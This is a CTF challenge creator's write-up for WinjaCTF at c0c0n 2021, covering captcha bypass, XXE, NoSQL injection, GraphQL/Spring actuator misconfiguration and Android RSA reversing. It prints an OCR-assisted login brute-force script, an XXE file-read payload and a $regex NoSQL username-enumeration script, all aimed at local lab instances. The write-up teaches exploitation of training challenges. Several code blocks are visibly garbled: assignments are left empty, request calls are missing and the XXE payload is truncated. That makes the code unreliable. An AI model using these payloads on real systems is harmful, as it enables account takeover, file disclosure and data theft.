WinjaCTF Official Writeup | c0c0n 2021

Hi there!

This blog contains the write-up for 1 android and 4 web challenges which I created for Winja CTF for the c0c0n 2021 event.

This was my first time creating the CTF challenges.
Hope you had fun/learned something new while solving the challenges. Thanks to Riddhi for giving me the opportunity.

Web Challenges

Cha-Cha-Cha(Captcha Bypass)

  • In this Challenge, user was given a login page with top 100 lists of username and password.
  • Username and password(which was same as username) was changing every 3 min from the given list.
  • This challenge was all about bypassing the simple captcha using OCR tools like tesseract.
  • Below is the payload in python for solving the challenge.
import requests as req
import subprocess

def getCaptcha(session):
	res = session.get("http://localhost:8080/captcha")
	file  = open("captcha.jpeg","wb")
	file  = open("./test.txt","r")
	captchaString =
	return captchaString.strip()
def login():
	file  = open("./top100usernames.txt","r")
	for userName in file.readlines():
		session = req.Session()
		captcha = getCaptcha(session)
		data = {'userName':userName.strip(),'password':userName.strip(),'captcha':captcha}
		res ="http://localhost:8080/submit",data)
		serverResponse = res.text
        #print("Home" in serverResponse)
		if("Home" in serverResponse):
			print("Got the Creds")


  • On visiting the link of the chall, there was one user details(username:p3n7a90n,age:21, and some other fields) on the home page and the below hint in the source code.
<!--       Todo: Adding UI Change for loading the profile details uploaded publicly in XML format via query param-->
  • Now the user had to host their malicious XML publically and pass the link to the profile param.
  • Below is the XXE payload to retrieve the flag.
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
<!ENTITY xxe SYSTEM "/flag">



  • On visiting the chall link, user got a sign-in page and a hint that the site is powered by MongoDB and express.
  • Sign-in Page was vulnerable to Nosqli using $regex for pattern matching.
  • username: enumerating the username using the above vuln.
  • password: same as the username
  • Below is the payload in python for enumerating the username.
import requests
import string

charset = string.ascii_lowercase

def test_email(email):
    print("trying this..."+email)
    content ='http://localhost:4444/admin/login', json={'username': {'$regex': '^' + email}, 'password': 'asdf'}).content
    #print(b'Access Denied.Please try again.' in content)
    return b'Access Denied.Please try again.' in content

def get(prefix=''):
    # check if a prefix is a full email in the database
    if test_email(prefix + "$"):
        print("Found Username: "+prefix)

    for c in charset:
        if test_email(prefix + c):

            get(prefix + c)


MissConfig(Spring actuator endpoint and graphql playground library)

  • On visiting the chall link, there was a hint that we are trying out the latest technologies to fetch the data seamlessly.
  • The hint was to direct the user to think towards graphql.
  • User had to enumerate diff endpoint related to graphql using wordlists like SecLists.
  • Project was using the playground library(/playground) for the graphql.
  • After looking into the schema, it was accepting the username and password to get the details of the user.
  • User had to enumerate the spring actuator info endpoint(/actuator/info) to get the username and password.
  • Flag was stored in the desc part of the user.
  • Below is the query for retrieving the details of the user.

Android Challenge


  • On visiting the challenge, there was a link to download the apk.
  • User had to decompile the app using jadx or any other decompiler.
  • When the user enters the flag in the app, it gets encrypted with the RSA Stored key and matches with the existing encrypted value.
  • After looking into the decompiled java code, below is the method responsible for decrypting the key.
   public String decryptWithRSA(String data, Key privateKey) {
        try {
            Cipher cipher = Cipher.getInstance("RSA/ECB/NoPadding");
            cipher.init(2, privateKey);
            return new String(cipher.doFinal(Base64.decode(data, 0)));
        } catch (Exception e) {
            Log.e("Decryption Exception", "Something wrong with the Decryption", e);
            return null;

  • User had to pass the stored private key and the encrypted flag in the above method to get the plain text.

  • Flag: Flag{cyWanLv2d08dETGnEqoR_easy_reversing}

Feel free to drop any suggestions in the comments section.
Thanks for reading!!!.

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